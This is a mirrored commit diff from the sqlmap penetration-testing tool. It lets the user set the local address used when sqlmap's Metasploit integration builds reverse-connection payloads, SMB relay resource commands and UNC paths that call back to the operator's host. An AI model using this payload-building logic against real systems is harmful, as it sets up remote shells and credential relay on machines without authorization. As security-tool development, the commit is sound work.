mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-25 19:13:48 +03:00
Let the user choose also the local address in reverse OOB connection
This commit is contained in:
parent
06e8546177
commit
6f4035938b
|
@ -62,6 +62,7 @@ class Metasploit:
|
||||||
|
|
||||||
def __initVars(self):
|
def __initVars(self):
|
||||||
self.connectionStr = None
|
self.connectionStr = None
|
||||||
|
self.lhostStr = None
|
||||||
self.rhostStr = None
|
self.rhostStr = None
|
||||||
self.portStr = None
|
self.portStr = None
|
||||||
self.payloadStr = None
|
self.payloadStr = None
|
||||||
|
@ -298,12 +299,30 @@ class Metasploit:
|
||||||
raise sqlmapDataException, "unexpected connection type"
|
raise sqlmapDataException, "unexpected connection type"
|
||||||
|
|
||||||
|
|
||||||
|
def __selectLhost(self):
|
||||||
|
if self.connectionStr.startswith("reverse"):
|
||||||
|
message = "which is the local address? [%s] " % self.localIP
|
||||||
|
address = readInput(message, default=self.localIP)
|
||||||
|
|
||||||
|
if not address:
|
||||||
|
address = self.localIP
|
||||||
|
|
||||||
|
return address
|
||||||
|
|
||||||
|
elif self.connectionStr.startswith("bind"):
|
||||||
|
return None
|
||||||
|
|
||||||
|
else:
|
||||||
|
raise sqlmapDataException, "unexpected connection type"
|
||||||
|
|
||||||
|
|
||||||
def __selectConnection(self):
|
def __selectConnection(self):
|
||||||
return self.__skeletonSelection("connection type", self.__msfConnectionsList)
|
return self.__skeletonSelection("connection type", self.__msfConnectionsList)
|
||||||
|
|
||||||
|
|
||||||
def __prepareIngredients(self, encode=True, askChurrasco=True):
|
def __prepareIngredients(self, encode=True, askChurrasco=True):
|
||||||
self.connectionStr = self.__selectConnection()
|
self.connectionStr = self.__selectConnection()
|
||||||
|
self.lhostStr = self.__selectLhost()
|
||||||
self.rhostStr = self.__selectRhost()
|
self.rhostStr = self.__selectRhost()
|
||||||
self.portStr = self.__selectPort()
|
self.portStr = self.__selectPort()
|
||||||
self.payloadStr = self.__selectPayload(askChurrasco)
|
self.payloadStr = self.__selectPayload(askChurrasco)
|
||||||
|
@ -323,7 +342,7 @@ class Metasploit:
|
||||||
self.__cliCmd += " RHOST=%s" % self.rhostStr
|
self.__cliCmd += " RHOST=%s" % self.rhostStr
|
||||||
|
|
||||||
elif self.connectionStr.startswith("reverse"):
|
elif self.connectionStr.startswith("reverse"):
|
||||||
self.__cliCmd += " LHOST=%s" % self.localIP
|
self.__cliCmd += " LHOST=%s" % self.lhostStr
|
||||||
|
|
||||||
else:
|
else:
|
||||||
raise sqlmapDataException, "unexpected connection type"
|
raise sqlmapDataException, "unexpected connection type"
|
||||||
|
@ -339,7 +358,7 @@ class Metasploit:
|
||||||
self.__prepareIngredients(encode=False, askChurrasco=False)
|
self.__prepareIngredients(encode=False, askChurrasco=False)
|
||||||
|
|
||||||
self.__resource = "use windows/smb/smb_relay\n"
|
self.__resource = "use windows/smb/smb_relay\n"
|
||||||
self.__resource += "set SRVHOST %s\n" % self.localIP
|
self.__resource += "set SRVHOST %s\n" % self.lhostStr
|
||||||
self.__resource += "set SRVPORT %s\n" % self.__selectSMBPort()
|
self.__resource += "set SRVPORT %s\n" % self.__selectSMBPort()
|
||||||
self.__resource += "set PAYLOAD %s/%s\n" % (self.payloadStr, self.connectionStr)
|
self.__resource += "set PAYLOAD %s/%s\n" % (self.payloadStr, self.connectionStr)
|
||||||
self.__resource += "set LPORT %s\n" % self.portStr
|
self.__resource += "set LPORT %s\n" % self.portStr
|
||||||
|
@ -348,7 +367,7 @@ class Metasploit:
|
||||||
self.__resource += "set RHOST %s\n" % self.rhostStr
|
self.__resource += "set RHOST %s\n" % self.rhostStr
|
||||||
|
|
||||||
elif self.connectionStr.startswith("reverse"):
|
elif self.connectionStr.startswith("reverse"):
|
||||||
self.__resource += "set LHOST %s\n" % self.localIP
|
self.__resource += "set LHOST %s\n" % self.lhostStr
|
||||||
|
|
||||||
else:
|
else:
|
||||||
raise sqlmapDataException, "unexpected connection type"
|
raise sqlmapDataException, "unexpected connection type"
|
||||||
|
@ -369,7 +388,7 @@ class Metasploit:
|
||||||
self.__payloadCmd += " LPORT=%s" % self.portStr
|
self.__payloadCmd += " LPORT=%s" % self.portStr
|
||||||
|
|
||||||
if self.connectionStr.startswith("reverse"):
|
if self.connectionStr.startswith("reverse"):
|
||||||
self.__payloadCmd += " LHOST=%s" % self.localIP
|
self.__payloadCmd += " LHOST=%s" % self.lhostStr
|
||||||
|
|
||||||
elif not self.connectionStr.startswith("bind"):
|
elif not self.connectionStr.startswith("bind"):
|
||||||
raise sqlmapDataException, "unexpected connection type"
|
raise sqlmapDataException, "unexpected connection type"
|
||||||
|
@ -641,13 +660,14 @@ class Metasploit:
|
||||||
self.__initVars()
|
self.__initVars()
|
||||||
self.__randFile = "sqlmapunc%s.txt" % randomStr(lowercase=True)
|
self.__randFile = "sqlmapunc%s.txt" % randomStr(lowercase=True)
|
||||||
|
|
||||||
if kb.dbms in ( "MySQL", "PostgreSQL" ):
|
|
||||||
self.uncPath = "\\\\\\\\%s\\\\%s" % (self.localIP, self.__randFile)
|
|
||||||
else:
|
|
||||||
self.uncPath = "\\\\%s\\%s" % (self.localIP, self.__randFile)
|
|
||||||
|
|
||||||
self.__forgeMsfConsoleResource()
|
self.__forgeMsfConsoleResource()
|
||||||
self.__forgeMsfConsoleCmd()
|
self.__forgeMsfConsoleCmd()
|
||||||
|
|
||||||
|
if kb.dbms in ( "MySQL", "PostgreSQL" ):
|
||||||
|
self.uncPath = "\\\\\\\\%s\\\\%s" % (self.lhostStr, self.__randFile)
|
||||||
|
else:
|
||||||
|
self.uncPath = "\\\\%s\\%s" % (self.lhostStr, self.__randFile)
|
||||||
|
|
||||||
self.__runMsfConsole()
|
self.__runMsfConsole()
|
||||||
|
|
||||||
debugMsg = "Metasploit Framework 3 console exited with return "
|
debugMsg = "Metasploit Framework 3 console exited with return "
|
||||||
|
|
Loading…
Reference in New Issue
Block a user